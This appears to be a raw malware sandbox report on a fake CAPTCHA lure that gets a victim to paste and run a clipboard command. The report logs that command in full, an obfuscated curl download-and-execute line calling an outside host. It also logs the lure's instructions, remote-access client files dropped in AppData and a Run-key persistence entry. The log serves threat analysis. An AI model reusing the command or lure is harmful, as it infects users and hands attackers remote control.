Source: C:\Windows\System32\osk.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\osk.exe Section loaded: msacm32.dll
Source: C:\Windows\System32\osk.exe Section loaded: midimap.dll
Source: C:\Windows\System32\osk.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\osk.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\osk.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\osk.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\osk.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\osk.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\osk.exe Section loaded: twinapi.dll
Source: C:\Windows\System32\osk.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\osk.exe Section loaded: mstextprediction.dll
Source: C:\Windows\System32\osk.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\osk.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\osk.exe Section loaded: hid.dll
Source: C:\Windows\System32\osk.exe Section loaded: uiautomationcore.dll
Source: C:\Windows\System32\osk.exe Section loaded: propsys.dll
Source: C:\Windows\System32\osk.exe Section loaded: sxs.dll
Source: C:\Windows\System32\osk.exe Section loaded: uiamanager.dll
Source: C:\Windows\System32\osk.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\osk.exe Section loaded: dwrite.dll
Source: C:\Windows\System32\osk.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\osk.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\osk.exe Section loaded: wldp.dll
Source: C:\Windows\System32\osk.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\osk.exe Section loaded: actxprxy.dll
Source: C:\Windows\System32\osk.exe Section loaded: atlthunk.dll
Source: C:\Windows\System32\osk.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.shell.broker.dll
Source: C:\Windows\explorer.exe Section loaded: osksupport.dll
Source: C:\Windows\explorer.exe Section loaded: cdprt.dll
Source: C:\Windows\explorer.exe Section loaded: secur32.dll
Source: C:\Windows\explorer.exe Section loaded: mlang.dll
Source: C:\Windows\explorer.exe Section loaded: dui70.dll
Source: C:\Windows\explorer.exe Section loaded: duser.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.fileexplorer.dll
Source: C:\Windows\explorer.exe Section loaded: uiribbon.dll
Source: C:\Windows\explorer.exe Section loaded: networkexplorer.dll
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe Section loaded: storageusage.dll
Source: C:\Windows\explorer.exe Section loaded: fhcfg.dll
Source: C:\Windows\explorer.exe Section loaded: efsutil.dll
Source: C:\Windows\explorer.exe Section loaded: netapi32.dll
Source: C:\Windows\explorer.exe Section loaded: dsrole.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.system.userprofile.dll
Source: C:\Windows\explorer.exe Section loaded: cloudexperiencehostbroker.dll
Source: C:\Windows\explorer.exe Section loaded: credui.dll
Source: C:\Windows\explorer.exe Section loaded: wdscore.dll
Source: C:\Windows\explorer.exe Section loaded: dbghelp.dll
Source: C:\Windows\explorer.exe Section loaded: dbgcore.dll
Source: C:\Windows\explorer.exe Section loaded: wpnapps.dll
Source: C:\Windows\explorer.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\curl.exe Section loaded: secur32.dll
Source: C:\Windows\System32\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\curl.exe Section loaded: schannel.dll
Source: C:\Windows\System32\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\curl.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\tar.exe Section loaded: archiveint.dll
Source: C:\Windows\System32\tar.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\tar.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: pcicl32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: pcichek.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: pcicapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: samcli.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: dbgcore.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: nsmtrace.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: nslsp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: pcihooks.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: riched32.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: riched20.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: usp10.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: msls31.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: pciinv.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: firewallapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: fwbase.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\osk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{29CE1D46-B481-4AA0-A08A-D3EBC8ACA402}\InProcServer32
Source: C:\Windows\System32\tar.exe File written: C:\Users\user\AppData\Roaming\Dire\NSM.ini
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe File opened: C:\Windows\SysWOW64\riched32.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe File opened: C:\Users\user\AppData\Roaming\Dire\MSVCR100.dll
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: PCICHEK.DLL.31.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: PCICL32.DLL.31.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.31.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.31.dr
Source: Binary string: E:\nsmsrc\nsm\1410\1410\client32\release_unicode\client32.pdb source: client32.exe, 00000020.00000000.1486224969.00000000007C2000.00000002.00000001.01000000.0000000D.sdmp, client32.exe.31.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: pcicapi.dll.31.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.31.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb@ source: hw.dll.31.dr
Source: Binary string: C:\buildslave\goldsrc_win32\build\GoldSrc\engine\GL_Release_STEAM\hw.pdb source: hw.dll.31.dr
Source: Binary string: F:\project\delphi\itop\ipv6chek\Release\DllForIpv6.pdb source: pnf1.dll1.31.dr, pnf1.dll0.31.dr

Data Obfuscation

barindex
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\conhost.exe "C:\WINDOWS\system32\conhost.exe" cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST https://www.stlchicago.com/header.php -o C:\ProgramData\cvcv.bat && start /min "" C:\ProgramData\cvcv.bat Enter
Source: libopus-0.dll.31.dr Static PE information: section name: .xdata
Source: avutil-59.dll.31.dr Static PE information: section name: .xdata
Source: libopus-0.dll0.31.dr Static PE information: section name: .xdata
Source: avutil-59.dll0.31.dr Static PE information: section name: .xdata
Source: libopus-0.dll1.31.dr Static PE information: section name: .xdata
Source: avutil-59.dll1.31.dr Static PE information: section name: .xdata
Source: PCICL32.DLL.31.dr Static PE information: section name: .hhshare
Source: msvcr100.dll.31.dr Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

barindex
Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Select 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below c Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: -8 about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:39 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Open: 0K Cancel Browse... Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below c Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard video visit value very Vla version View Visa PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. Enter} Open: Browse... 0K Cancel Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY English (United Kingdom) Swiss German keyboard Ray 10: 4nkbyi8avf To switch input methods, press Performance and security by Cloudflare Windows key+Space. ENG 15:40 p Type here to search
Source: screenshot OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:39 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Move the cursor to where you want to enter text. Shift Shift Del ScrLk Dock PrtScn > Alt Ctrl Fade Fn Ctrl Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: about:blan Home Fountain of Health e In ey + ress 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG Type here to search SG 02/06/2025
Source: screenshot OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: -8 about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below c Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY Hcme I Fcuntain cf Health - GccglE Chrcme Home I Fountain of Health - Gom by Cloudflare 15:40 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause s Shift Shift Del ScrLk Dock PrtScn > AltGr Ctrl < Alt Fade Fn Ctrl Optidns Help Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: -8 x about:blank x Home Fountain of Health X fountainofhealth.ca/en fountainofhealth.ca Verify you are human by completing the action below o Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps Lise keyboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard O VERIFY English (United Kingdom) Swiss German keyboard Ray 10: 4nkbyi8avf To switch input methods, press Performance and security by Cloudflare V,/inclcws key+Space. ENG 15:40 p Type here to search SG 02/06/2025
Source: screenshot OCR Text: e about:blank Home Fountain of Health fountainofhealth.ca/en On-Screen Keyboard video value visit very Vla version View Visa PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Ctrl Fade Fn Ctrl Alt Options Help AltGr Complete these verification steps Lise keyboard Clipboard To prove you are not robot 1. Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Can't show history See all your copied items in one placel Turn on clipboard history naw. Turn on Run Type the name of a program, folder, document or Internet resource, and Windows will open It for you. " ramOata\cvcv.bat" Enter Browse... 0K Cancel Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: screenshot OCR Text: about:blan Home Fountain of Health On-Screen Keyboard PgUp Esc Nav Home Tab End PgDn Mv Up q Enter Caps Insert Pause Shift Shift Del ScrLk Dock PrtScn > Alt Ctrl Fade Fn Ctrl Options Help AltGr e In ey + ress 2. In verification window, press Ctrl key + V 3. Press Enter key an your keyboard VERIFY Ray 10: 4nkbyi8avf Performance and security by Cloudflare 15:41 ENG p Type here to search SG 02/06/2025
Source: Chrome DOM: 0.6 OCR Text: fountainofhealth.ca Verify you are human by completing the action below O Verifying... fountainofhealth.ca needs ta review the security of your connection before proceeding. Complete these verification steps use keyboard To prove you are not robot 1, Press & hold the Win key + R 2. In verification window, press Ctrl key + V 3, Press Enter key on your keyboard Ray 10: 4nkbyi8avf Performance and security by Cloudflare
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Clipboard modification: C:\WINDOWS\system32\conhost.exe cmd.exe /c cmd.exe /c cmd.exe /c c^u^rl.e^x^e -k -Ss -X POST "https://www.stlchicago.com/header.php" -o "C:\ProgramData\cvcv.bat" && start /min "" "C:\ProgramData\cvcv.bat" Enter
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\zojtai\libopus-0.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\zojtai\avutil-59.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\djalji\adtw.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\kustai\avutil-59.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\client32.exe
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\pcicapi.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\zojtai\pnf1.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\remcmdstub.exe
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\kustai\libopus-0.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\hw.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\PCICHEK.DLL
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\msvcr100.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\PCICL32.DLL
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\djalji\avutil-59.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\djalji\pnf1.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\kustai\pnf1.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\kustai\adtw.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\zojtai\adtw.dll
Source: C:\Windows\System32\tar.exe File created: C:\Users\user\AppData\Roaming\Dire\djalji\libopus-0.dll
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PP1
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\osk.exe Window / User API: threadDelayed 2000
Source: C:\Windows\System32\osk.exe Window / User API: threadDelayed 361
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Window / User API: threadDelayed 549
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe Window / User API: threadDelayed 9104
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\libopus-0.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\avutil-59.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\adtw.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\avutil-59.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\pnf1.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\libopus-0.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\HTCTL32.DLL
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\remcmdstub.exe
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\hw.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\avutil-59.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\pnf1.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\TCCTL32.DLL
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\pnf1.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\kustai\adtw.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\zojtai\adtw.dll
Source: C:\Windows\System32\tar.exe Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Dire\djalji\libopus-0.dll
Source: C:\Windows\System32\osk.exe TID: 7172 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe TID: 3276 Thread sleep time: -137250s >= -30000s
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe TID: 3276 Thread sleep time: -2276000s >= -30000s
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Users\user\AppData\Roaming\Dire\client32.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 00000014.00000000.1326758086.0000000002A20000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000014.00000000.1337084127.0000000008313000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42efC
Source: explorer.exe, 00000014.00000000.1337084127.0000000008170000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWt_@
